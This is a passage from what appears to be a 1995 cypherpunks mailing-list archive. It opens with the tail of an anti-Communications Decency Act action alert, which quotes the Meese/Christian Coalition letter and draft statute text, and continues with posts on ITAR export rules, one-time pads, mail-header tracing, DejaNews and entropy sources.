>Decency Act, the Christian Coalition seeks to regulate all indecent
>speech online.
>
>Indecency is a broad category that includes everything from George Carlin's
>"seven dirty words" to such classic novels and "The Catcher in the Rye" and
>"Lady Chatterly's Lover". 
>
>The Supreme Court has ruled that restrictions on indecent speech are 
>Constitutional only if they rely on the "least restrictive means".  Broad
>indecency restrictions on interactive media do not satisfy the "least
>restrictive means" test, because interactive media allows users and
>parents tremendous control over the information they receive.
>
>Any legislation which attempts to apply an indecency restriction to the 
>Internet is unconstitutional on its face.
>
>The Christian Coalition's proposal that relies on an indecency
>restriction contemplates dumbing down every conversation, web page,
>newsgroup, and mailing list on the Internet to the level of what is
>not offensive to children.
>
>What kind of discussions between adults are possible in an arena
>where everything has been reduced to the level of the Lion King?
>
>
>UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC
>The Christian Coalition would give the FCC broad jurisdiction over
>cyberspace.  It would allow the FCC jurisdiction over your online
>speech, and over the design Internet software, such as web browsers and
>filtering programs that parents can use to control their children's
>access to the Internet.
>
>The Internet has developed from a government project to a market-driven
>economic boom for thousands of businesses.  Giving the FCC authority over
>this medium would significantly hinder the growth of this new industry.
>
>________________________________________________________________________
>WHAT YOU CAN DO NOW
>
>1. The proposals from the Religious Right will literally destroy online
>   speech as we know it.  The odds of stopping this are not certain.
>
>   There is a very real chance that this legislation will pass, and
>   we will experience a period of uncertainty and chilling of speech
>   while an appropriate test case attempts to reach the Supreme Court
>   (should it even get there!)
>
>   The Religious Right has a strong grass-roots network.  We need to
>   counter their energy and ensure cyberspace is not lost due to them.
>
>   IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader
>   Dole (R-KS) and urge them to oppose the Christian Coalition's
>   proposal.
>
>   Name, Address, and Party     Phone            Fax
>   ========================     ==============   ==============
>   R GA Gingrich, Newt 		1-202-225-4501   1-202-225-4656
>   R KS Dole, Robert            1-202-224-6521   1-202-224-8952
>
>   If you're at a loss for words, try one of the following:
>
>	Please oppose the recent proposal from the Religious Right to
>	censor the Internet.  The only effective way to address children's
>	access to the Internet is through parental control tools outlined
>	by the Cox/White/Wyden approach.
>   or
>	As a religious person and a parent, I oppose the Religious Right's
>	attempts to censor the Internet.  I am the best person to monitor
> 	my child's access to the Internet using parental control tools
>	as outlined in the Cox/White/Wyden approach.
>  
>2. Join the online fight by becoming a volunteer for your district!
>
>   Check to see if you're legislator is in the list below.  If they are
>   not, consult the free ZIPPER service that matches Zip Codes to
>   Congressional districts with about 85% accuracy at:
>
>	URL:http://www.stardot.com/~lukeseem/zip.html
>
>   The conference committee legislators are:
>   House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA),
>	Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN),
>	Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX),
>	Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA),
>	Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL),
>	Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA),
>	Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL),
>	Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL),
>	White (R-WA)
>   Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA),
>	Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ),
>	Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK)
>
>   If your legislator is on the conference committee, you have a chance
>   to influence their vote on this issue with your power as a constituent.
>   Volunteer to help educate your legislator by sending mail to
>   volunteer at vtw.org.  A coalition volunteer will be in touch with you.
>
>   You can starting working to help spread the word in your district by
>   sending this letter to five friends.  Ask them to call Dole and Gingrich
>   as well.
>
>3. The People for the American Way (PFAW) and the American Civil Liberties
>   Union are organizing a letter from ORGANIZATIONS to the Conference
>   Committee to oppose the censorship provisions.
>
>   If you are a representative of an organization that would like to
>   signon to this letter, you should contact jlesser at pfaw.org IMMEDIATELY. 
>
>4. We can't suggest relaxing at this point.  The stakes are too high, and
>   the risk is too great.  Everything now hangs in the balance.
>
>________________________________________________________________________
>THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT
>
>October 16, 1995
> 
>The Honorable Thomas J. Bliley, Jr.  Chairman
>Committee on Commerce
>United States House of Representatives
>Washington, DC 20515
> 
>The Honorable Larry Pressler, Chairman
>Committee on Commerce, Science, and Transportation
>United States Senate
>Washington, DC 20510
> 
>Re: Computer Pornography Provisions in Telecommunications Bill
> 
>Dear Mr. Chairmen:
> 
>We are writing to urge the conference committee seeking to reconcile the
>telecommunications bills passed by the House and Senate include in the
>final bill the strongest possible criminal law provisions to address the
>growing and immediate problem of computer pornography without any
>exemptions, defenses, or political favors of any kind accorded to those
>who knowingly participate in the distribution of obscenity to anyone or
>indecency to children. While there is no perfect solution to the problem
>of computer pornography, Congress could not hope to solve this problem by
>holding liable only some who are responsible for the problem.
> 
>The recent Justice Department prosecution project targeting those who
>violated federal child pornography law using America On-Line is
>instructive in this regard. More than ninety individuals were targeted for
>prosecution although many others, perhaps as many as 3,000 according to
>one press report, were originally targeted by the Department of Justice as
>potential violators of child pornography laws. Apparently due to a
>shortage of investigative and prosecutorial resources, the project was
>limited. Since there are insufficient resources to investigate and
>prosecute but a fraction of those that are trafficking in child
>pornography by computer, then there will likely be even fewer resources
>available to investigate and prosecute those involved in obscenity and
>indecency.
> 
>Thousands of individuals both in this country and abroad are regularly
>placing obscenity and indecency on the Internet. It is not possible to
>make anything more than a dent in the serious problem of computer
>pornography if Congress is willing to hold liable only those who place
>such material on the Internet while at the same time giving legal
>exemptions or defenses to service or access providers who profit from and
>are instrumental to the distribution of such material. The Justice
>Department normally targest the major offenders of laws. In obscenity
>cases prosecuted to date, it has targeted large companies which have been
>responsible for the nationwide distribution of obscenity and who have made
>large profits by violating federal laws. Prosecution of such companies has
>made a substantial impact in curbing the distribution of obscenity, with
>many such offenders going out of business altogether. So too will
>prosecution of access providers which _knowingly_ traffic in obscenity
>have a substantial impact, a far greater impact than just the prosecution
>of a person who places one or a few prohibited images on the Internet.
>Such a person could not traffic in pornography without the aid or
>facilitation of the service or access providers. Indeed, if Congress
>includes provisions protecting access or service providers in whatever
>bill is finally passed, it is likely that most in this country who are
>trafficking in indecency to children or obscenity would continue to do so
>since the threat of prosecution would be minuscule, given the numbers of
>those currently involved in this activity. It is also likely that those
>outside our country who are engaged in these activities would continue to
>do so since it would be nearly impossible to extradite them to the United
>States for prosecution. Thus, unless all who knowingly participate in such
>matters are subject to the law, the Internet will remain the same and
>Congress will have failed in its responsibilities to the children and
>families of America.
> 
>Federal law has traditionally assigned equal liability both for those who
>commit a crime and those who aid and abet a crime. See Title 18 U.S.C.
>Code Section 2: "(a) whoever [sic] commits an offense against the United
>States or aids, abets, councils [sic], commands, induces, or procures its
>commission, is punishable as a principle [sic]." Service or access
>providers who knowingly participate in the distribution of indecency to
>children or in obscenity to anyone are aiders and abettors in the
>commission of those crimes and thus should have liability under any law
>Congress passes. Current federal law on child pornography provides no no
>exemption or defense for access providers. Thus, the child pornography law
>provides a strong deterrent against trafficking in child pornography for
>those who would otherwise knowingly participate in its distribution by
>computer whether pedophile or access provider.
> 
>The changes in law which we support would not hold an access provider
>criminally liable for all illegal pornography on the Internet which their
>services may be used to obtain. Nor would it require that access providers
>check all communications to ensure that no violations of the law are
>occurring. They would simply be required to avoid knowing violations of
>the law. This is an obligation imposed on all citizens. Technology exists
>today for access providers, through a simple process, to target or flag
>and remove files containing objectionable material.
> 
>We support the House-passed language insofar as it addresses obscenity by
>amendment Title 18, Sections 1462, 1465, and 1467 of the United States
>Code. The provision restricting transmission of indecency in the House-passed
>bill, an amendment to Section 1465, is inadequate, and we urge that it be
>substantially revised.
> 
>Attached is the specific language we support which includes the House
>passed language on obscenity and includes revisions on both the House
>passed language on indecency, which would amend Title 18 and the
>Senate-passed language on indecency, which would amend Title 47. The
>combination of these provisions, we believe, would provide effective laws
>to curb obscenity and indecency on the Internet by establishing that all
>who knowingly participate in the distribution or facilitation of obscenity
>to anyone or indecency to children would be subject to the law.
> 
>Thank you for your concern and attention to this matter.
> 
> 
>[signed]
> 
>Edwin Meese III
> 
>Ralph Reed
>Christian Coalition
> 
>Donald E. Wildmon
>American Family Association
> 
>Alan Sears, Former Executive Director
>Atty General's Commission on Pornography
> 
>Phyllis Shafly
>Eagle Forum
> 
>Beverly LaHaye
>Concerned Women for America
> 
>Reverend Louis P. Sheldon
>Traditional Values Coalition
> 
>Jay Sekulow
>American Center for Law and Justice
> 
>Paul Weyrich
>Free Congress Foundation
> 
>Paul McGeady
>Morality in Media
> 
>Len Munsil
>National Family Legal Foundation
> 
>Robert Peters
>Morality in Media
> 
>Kenneth Sukhia
>Former United States Attorney, N.D., FL
>Former Chairman, Atty General's Advisory Committee
>Subcommittee on Child Exploitation and Obscenity
>
>
>--------------------------
>
> 
>Section 1465 of Title 18, United States Code, is amended to punish
>distribution by computer of indecent material to minors by adding at the
>end the following:
> 
>Whoever knowingly communicates, transmits, or makes available for
>communication or transmission, in or effecting interstate or foreign
>commerce an indecent communication by computer to any person the
>communicator or transmitter believes has not attained the age of 18 years
>of age, knowing that such communication will be obtained by a person
>believed to be under 18 years of age, shall be fined under this title or
>imprisoned not more than five years, or both.
> 
>TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF
>TELECOMMUNICATIONS FACILITY
> 
>SEC. 401. SHORT TITLE
>         This title may be cited as the "Communications Decency Act of
>1995".
> 
>Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER
>THE COMMUNICATIONS ACT OF 1934
> 
>Section 223 (47 U.S.C. 223) is amended --
>   (1) by striking subsection (a) and inserting in lieu of [sic]:
> ``(a) Whoever--
>    ``(1) in the District of Columbia or in interstate or foreign
>communications --
>        ``(A) by means of telecommunications device knowingly--
>          ``(i) makes, creates, or solicits, and
>          ``(ii) initiates the transmission of,
>     any comment, request, suggestion, proposal, image, or other
>     communication which is obscene, lewd, lascivious, filthy, or
>     indecent, with intent to annoy, abuse, threaten, or harass
>     another person;
>         ``(B) makes a telephone call or utilizes a
>     telecommunications device, whether or not conversation or
>     communication ensues, without disclosing his identity and
>     with intent to annoy, abuse, threaten, or harass any person
>     at the called number or who receives the communication;
>         ``(C) makes or causes the telephone of another repeatedly
>     or continuously to ring, with intent to harass any person at
>     the called number; or
>         ``(D) makes repeated telephone calls or repeatedly
>     initiates communication with a telecommunications device,
>     during which conversation or communication ensues, solely to
>     harass any person at the called number or who receives the
>     communication;
>      ``(2) knowingly permits any telecommunications facility
>     under his control to be used for any activity prohibited by
>     paragraph (1) with the intent that it be used for
>     such activity,
> 
>  shall be fined not more than $100,000 or imprisoned not more
>  than two years, or both.''; and
> 
>   (2) by adding at the end the following new subsections:
> 
> ``(d) Whoever--
>       ``(1) knowingly within the United States or in foreign
>     communications with the United States by means of
>     telecommunications device makes or makes available any
>     indecent communication in any form including any comment,
>     request, suggestion, proposal, or image, to any person under
>     18 years of age regardless of whether the
>     maker of such communication placed the call or initiated the
>     communication; or
>       ``(2) knowingly permits any telecommunications facility
>     under such person's control to be used for an activity
>     prohibited by paragraph (1) with the intent that it be
>     used for such activity,
>  shall be fined not more than $100,000 or imprisoned not more
>  than two years or both.
>      ``(e) Defenses to subsections (a) and (d), restrictions on 
>     access, judicial remedies respecting restrictions for
>     persons providing information services and
>     access to information services--
>      "(1) It is a defense to prosecution that a person has complied
>     with regulations designed to restrict access to indecent
>     communications to those 18 years old or older as enacted by the
>     Federal Communications Commission which shall prepare final 
>     regulations within 120 days of the passage of this bill. Until
>     such regulations become effective, it is a defense to
>     prosecution that the person has blocked or restricted access
>     to indecent communications to any person under 18 years
>     of age through the use of verified credit card, adult access
>     code, or adult personal identification number (PIN).   
>     Nothing in this subsection shall be construed to treat
>     enhanced information services as common carriage."
>       "(2) No cause of action may be brought in any
>     court or any administrative agency against any person on account
>     of any activity which is not in violation of any law punishable
>     by criminal or civil penalty, which activity the person has taken in
>     good faith to implement a defense authorized under this section or
>     otherwise to restrict or prevent the transmission of, or access to,
>     a communication specified in this section.
>     (f) Nothing in this subsection shall preclude any State or
>     local government from enacting and enforcing laws and regulations
>     which do not result in the imposition of inconsistent obligations on
>     the provision of interstate services.  Nothing in this subsection
>     shall preclude any State or local government from governing conduct
>     not covered by subsection (d)(2)."
>     (g) Nothing in subsection (a), (d), or (e) or in the
>     defenses to prosecution under (e) shall be construed
>     to affect or limit the application or enforcement of any other
>     Federal law.
>     (h) The use of the term 'telecommunications device' in this
>     section shall not impose new obligations on (one-way) broadcast
>     radio or (one-way) broadcast television operators licensed by the
>     Commission or (one-way) cable services registered with the
>     Federal Communications Commission and covered by obscenity and
>     indecency provisions elsewhere in this Act.
> 
>Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.
> 
>        Section 639 (47 U.S.C. 559) is amended by striking "10,000" and
>inserting "$100,000"
> 
>Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.
> 
>        Section 1466 of Title 18, United States Code, is amended by
>striking out "$10,000" and inserting "$100,000".
> 
>Sec. 405 SEPARABILITY
> 
>        "(a) If any provision of this Title, including amendments to this
>Title of [sic] the application thereof to any person or circumstance is
>held invalid, the remainder of this Title and the application of such
>provision to other persons or circumstances shall not be affected
>thereby."
>
>________________________________________________________________________
>CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT
>
>Sep 26, '95	Sen. Russ Feingold urges committee members to drop
>		Managers Amendment and the CDA from the Telecommunications
>		Deregulation bill
>Aug  4, '95	House passes HR1555 which goes into conference with S652.
>Aug  4, '95	House votes to attach Managers Amendment (which contains
>		new criminal penalties for speech online) to
>		Telecommunications Reform bill (HR1555).
>Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
>	 	Reform bill (HR1555).
>Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
>		Empowerment Act" (HR 1978) as an alternative to the CDA.
>Jun 21, '95     Several prominent House members publicly announce their
>                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
>                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
>Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
>                reform bill (S 652) by a vote of 84-16.  The Leahy bill
>                (S 714) is not passed.
>May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
>                in the House with the Leahy alternative attached to it,
>                thanks to Rep. Ron Klink of (D-PA).  The Communications
>                Decency Act is not attached to it.
>Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
>                the Exon/Gorton bill, which commissions the Dept. of
>                Justice to study the problem to see if additional legislation
>                (such as the CDA) is necessary.
>Mar 23, '95     S314 amended and attached to the telecommunications reform
>                bill by Sen. Gorton (R-WA).  Language provides some provider
>                protection, but continues to infringe upon email privacy
>                and free speech.
>Feb 21, '95     HR1004 referred to the House Commerce and Judiciary
>committees
>Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
>Feb  1, '95     S314 referred to the Senate Commerce committee
>Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).
>
>________________________________________________________________________
>FOR MORE INFORMATION
>
>Web Sites
>        URL:http://www.vtw.org/exon/
>        URL:http://epic.org/
>        URL:http://www.eff.org/pub/Alerts/
>        URL:http://www.cdt.org/cda.html
>	URL:http://outpost.callnet.com/outpost.html
>
>FTP Archives 
>        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
>        URL:ftp://ftp.eff.org/pub/Alerts/
>
>Gopher Archives:
>        URL:gopher://gopher.panix.com/11/vtw/exon
>        URL:gopher://gopher.eff.org/11/Alerts
>
>Email:
>        vtw at vtw.org (put "send alert" in the subject line for the latest
>		alert, or "send cdafaq" for the CDA FAQ)
>        cda-info at cdt.org (General CDA information)
>        cda-stat at cdt.org (Current status of the CDA)
>
>________________________________________________________________________
>LIST OF PARTICIPATING ORGANIZATIONS
>
>In order to use the net more effectively, several organizations have
>joined forces on a single Congressional net campaign to stop the
>Communications Decency Act.
>
>American Civil Liberties Union * American Communication Association *
>American Council for the Arts * Arts & Technology Society * Association
>of Alternative Newsweeklies * biancaTroll productions * Boston
>Coalition for Freedom of Expression * Californians Against Censorship
>Together * Center For Democracy And Technology * Centre for Democratic
>Communications * Center for Public Representation * Citizen's Voice -
>New Zealand * Cloud 9 Internet *Computer Communicators Association *
>Computel Network Services * Computer Professionals for Social
>Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
>Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
>Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
>Electronic Frontier Foundation - Austin * Electronic Frontiers
>Australia * Electronic Frontiers Houston * Electronic Frontiers New
>Hampshire * Electronic Privacy Information Center * Feminists For Free
>Expression * First Amendment Teach-In * Florida Coalition Against
>Censorship * FranceCom, Inc. Web Advertising Services * Friendly
>Anti-Censorship Taskforce for Students * Hands Off!  The Net * Inland
>Book Company * Inner Circle Technologies, Inc. * Inst. for Global
>Communications * Internet On-Ramp, Inc. * Internet Users Consortium *
>Joint Artists' and Music Promotions Political Action Committee * The
>Libertarian Party * Marijuana Policy Project * Metropolitan Data
>Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle
>Greenway * National Campaign for Freedom of Expression * National
>Coalition Against Censorship * National Gay and Lesbian Task Force *
>National Public Telecomputing Network * National Writers Union * Oregon
>Coast RISC * Panix Public Access Internet * People for the American Way
>* Republican Liberty Caucus * Rock Out Censorship * Society for
>Electronic Access * The Thing International BBS Network * The WELL *
>Voters Telecommunications Watch
>
>(Note: All 'Electronic Frontier' organizations are independent entities,
> not EFF chapters or divisions.)
>
>________________________________________________________________________
>	End Alert
>========================================================================
>
>

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison at mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************







From tcmay at got.net  Mon Nov  6 21:27:17 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 13:27:17 +0800
Subject: toolkits?
Message-ID: <acc415d311021004dd09@[205.199.118.202]>


The most common typo (of any significance) I seem to make is leaving out
the "not" in a strongly worded statement:

>You may have gotten no responses because it generally is not up to a state
>government to ensure that "mediocrity" in the Internet is avoided (though
>I'm not sure what is meant by "mediocrity." If it is security and
>anonymity, this is definitely the state government's responsibility, or
                               ^
                               not
>even area of interest.)

It's almost as if I'm "leaning on the horn" so much as I'm typing, that I
leave out the all-important "not" modifier.

My apologies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From hallam at w3.org  Mon Nov  6 21:33:54 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 13:33:54 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <9511070341.AA15892@zorch.w3.org>



Perry chips in :
>"Peter D. Junger" writes:
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.

>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superceeded by lower
>level laws, in spite of the supremecy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.

Actually there are exclusion clauses in most international trade treaties
to exclude items such as arms and drugs from transhipment clauses.
There are also various treaties to control trafic in arms and drugs whose
provisions may have precedence.

The US is not known for sticking to the narrow wording of an international
treaty in such cases. Panama was invaded for alledged transhipment of drugs
after all. I doubt anyone would seriously attempt to find a justification
for that act in international law. 

One of the many problems in Perry's approach is that an international treaty
is in essence a contract between governments. If the governments chose
to interpret a contract in a particular way they may not consider it any of
your buisness as a third party. They are after all always free to 
negotiate a new treaty.


Perry's somewhat offensive language is not a substitute for an argument.
Treaties certainly arn't "treaties period" otherwise the profession of
law would be a somewhat less skilled one. There is clearly considerable
complexity in the interpretation of treaties and in determining the
scope of their application, the various remedies they provide for and so
on. 

I think I would take Perry's disbelief that a person is a lawyer becuse
he disagrees with him as reflecting more on Perry than anyone else.
All contrary views are rejected... hmm...


	Phill





From adam at homeport.org  Mon Nov  6 21:35:43 1995
From: adam at homeport.org (Adam Shostack)
Date: Tue, 7 Nov 1995 13:35:43 +0800
Subject: using pgp to make an otp
In-Reply-To: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511070407.XAA04557@homeport.org>


amp wrote:

| my point here is that _if_ pgp output is random enough, i wouldn't need
| hardware. even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as imput for a stream cypher.

	PGP output is not random enough to be used for a one time pad.
The security of a OTP is *entirely* based on the quality of the random
numbers; they should come from some strong generator.  Building good
one time pads is tough, and usually not worth the effort.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Mon Nov  6 21:37:01 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 13:37:01 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070208.VAA14762@jekyll.piermont.com>
Message-ID: <m0tCewB-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


"Perry E. Metzger" writes:

: I am starting to have trouble believing you are a lawyer. Are you
: actually telling me that treaties which explicitly indemnify
: transshipment customers against local laws are superceeded by lower
: level laws, in spite of the supremecy clause of the constitution? That
: might be what the state department would tell you, but I'd have
: trouble believing even a lobotomized mongoloid judge would let that
: stand. Treaties are treaties, period.

What I am telling you, if you would pay attention, is that there is no
transhipment involved.  The violation of the ITAR consists of
disclosing information, not shipment.

And that is pretty clearly unconstitutional because it violates the
first amendment, but it has nothing whatsoever to do with any
treaties--certainly nothing to do with treaties about transhipment.

If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
to a German businessman there, that is literally a violation of the
ITAR.  If the disclosure is made by sending a copy of the software from
one hotel room to another, and if that message happens to get routed
through the United States, that is still a violation.  The fact that the
message went through the United States is irrelevant.

Don't expect the ITAR to make any sense.  And don't think that you can
apply logic to the ITAR and get logical results.  It doesn't work that
way.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From sommerfeld at orchard.medford.ma.us  Mon Nov  6 21:40:23 1995
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Tue, 7 Nov 1995 13:40:23 +0800
Subject: forging headers
In-Reply-To: <199511070255.VAA14851@jekyll.piermont.com>
Message-ID: <199511070353.DAA01678@orchard.medford.ma.us>


-----BEGIN PGP SIGNED MESSAGE-----

> You didn't send ALL the headers, only some of them. You need to send
> on the full set to make a trace possible.

More specifically, the headers which are most needed are the Received:
and Message-Id: headers; each mailer along the path adds another
Received; header, typically with its name, a timestamp, and sometimes
the name or address of the previous system.  

Other headers may also help.

> Lee Tien writes:
> > So I got this message.  How would someone identify the sender of this
> > message?  I'm writing an article on anonymity, with some discussion of
> > remailers, and want to argue that forging already permits people to raise
> > the costs of tracing significantly, anonymous remailers or no.  

						- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMJ7YHrT+rHlVUGpxAQHfSgP/YDoEM9chlFLNZ1U4nzh6T13Lsswqv768
oTpssqzW+OYenKgop7FOGYIs7GpSdSGdgFyucYHlcBkUpVXOLMcs/pylwIVGy8Hl
T/lrsNEjAEBjWlzZO6jSuKvrODZKGGfn7nTvmmCR8vKRtUlLnK3ljK8VphqpYvbm
Nmg6okhczZM=
=JO4Z
-----END PGP SIGNATURE-----





From perry at piermont.com  Mon Nov  6 22:06:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 14:06:55 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCewB-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511070405.XAA14913@jekyll.piermont.com>



"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> 
> : I am starting to have trouble believing you are a lawyer. Are you
> : actually telling me that treaties which explicitly indemnify
> : transshipment customers against local laws are superceeded by lower
> : level laws, in spite of the supremecy clause of the constitution? That
> : might be what the state department would tell you, but I'd have
> : trouble believing even a lobotomized mongoloid judge would let that
> : stand. Treaties are treaties, period.
> 
> What I am telling you, if you would pay attention, is that there is no
> transhipment involved.  The violation of the ITAR consists of
> disclosing information, not shipment.

Given that it is a non-U.S. national disclosing information to a
non-U.S. national, both being outside the U.S.'s borders, with their
only involvement with the U.S. being an incidental traversal of their
communications via U.S. telecoms networks, I would say that it would
be a case where the telecoms treaties would come into play.

> If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
> to a German businessman there, that is literally a violation of the
> ITAR.

Where the hell did you get that idea?  The ITAR clearly does not apply
to foreigners disclosing things to each other outside the United
States. I've read it and I can't see how it could possibly be so
interpreted. I'm not a lawyer, but this interpretation is so bizarre
as to be almost untenable. I can clearly see that a U.S. person
talking about DES to a foreign person can be a violation under the
language in the regulations, but there is no way on earth to interpret
the regulations as applying to foreigners abroad talking to other
foreigners outside the U.S.

> Don't expect the ITAR to make any sense.  And don't think that you can
> apply logic to the ITAR and get logical results.  It doesn't work that
> way.

I was under the impression, though, that the words meant what they
said.

Perry





From llurch at networking.stanford.edu  Mon Nov  6 22:19:28 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Tue, 7 Nov 1995 14:19:28 +0800
Subject: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <Pine.ULT.3.91.951106203817.19364A-100000@Networking.Stanford.EDU>


On Mon, 6 Nov 1995, Damaged Justice wrote:

> My two cents: I've used Dejanews for almost a month now, and have been
> consistently impressed with the results. The uses are many; the danger,
> as others have noted, is that people forget (or never realize in the
> first place) that you should never post anything to Usenet that you
> wouldn't want to see plastered on the evening news.
> 
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

I absitively agree. I have no quarrel with archiving and redistributing 
public information. I think it's great.

Might also help spread aewareness of the anonymity options available. It 
would be good to see if the dejanews folks would give the anon servers a 
plug. Anybody friendly with them?

-rich





From shields at tembel.org  Mon Nov  6 22:56:19 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 14:56:19 +0800
Subject: toolkits?
In-Reply-To: <199511070141.UAA15583@maple.sover.net>
Message-ID: <47moi5$ahc@yage.tembel.org>


In article <199511070141.UAA15583 at maple.sover.net>,
Stephen Whitaker <whitaker at sover.net> wrote:
> What constitutes a basic toolkit for trace route, sniff for promiscuous
> mode, all the other tools to map whats happening to net traffic in a little
> state of 1/2 million people? What are the sources of traffic information?

It won't help, because tapping wouldn't be done at the BGP4 level,
but at the switch (if with telco cooperation) or directly on the lines.
*You need end-to-end encryption*.  You need Kerberos or IPSEC.
-- 
Shields.





From bdolan at use.usit.net  Mon Nov  6 22:59:04 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Tue, 7 Nov 1995 14:59:04 +0800
Subject: consumer products that make nice sources
In-Reply-To: <acc00caf110210040ee2@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951106233235.10925A-100000@use.usit.net>




On Fri, 3 Nov 1995, Timothy C. May wrote:


> 
> I'd say they make poor sources. Far too large. A smaller source has better
> access to the detector without adding much to the overall background the
> user is exposed to. (I'm not saying low-level uranium or thorium sources
> are much of a hazard, but the fluence presented at the detector is very low
> for such an extended source.)
> 
> It depends on the detector type (alpha, beta, gamma, neutrino?), but high
> count rates can be obtained in a variety of ways. (Don't get too high a
> count rate, or the dead time characteristics of the pulse-height analyzers
> will introduce spurious correlations that decrease entropy--I mention this
> to show that even radiation detector sources of entropy have non-random
> issues to take into account.)


Gotta watch yourself around the physicist....

Most of the sources I mentioned are fairly anemic, however the Coleman 
lantern mantles are pretty good beta emitters.  I can get count rates 
approaching 1000 cpm on a tired GM tube detector with a beta window of 
unknown thickness.

Brad D.






From ses at tipper.oit.unc.edu  Mon Nov  6 23:05:22 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Tue, 7 Nov 1995 15:05:22 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SOL.3.91.951106202632.8543C-100000@chivalry>


On Mon, 6 Nov 1995, Peter D. Junger wrote:

> 
> Don't blame this on my being a lawyer; blame it on some very sick
> people in the Office of Defense Trade Controls and in the NSA.

I think it's unfair to call the people at the ODTC and the NSA sick; 
during the cold war, such restrictions did make some sense; in 
particular, controlling the export of high-performance encryption 
hardware does make it harder for other countries to deploy ubiquitous 
strong encryption, particularly in the less developed countries, and 
particulalry for chips that required exotic fabrication (the soviet union 
never had really good mass-production facilities). 

Controlling software encryption without controlling publication never
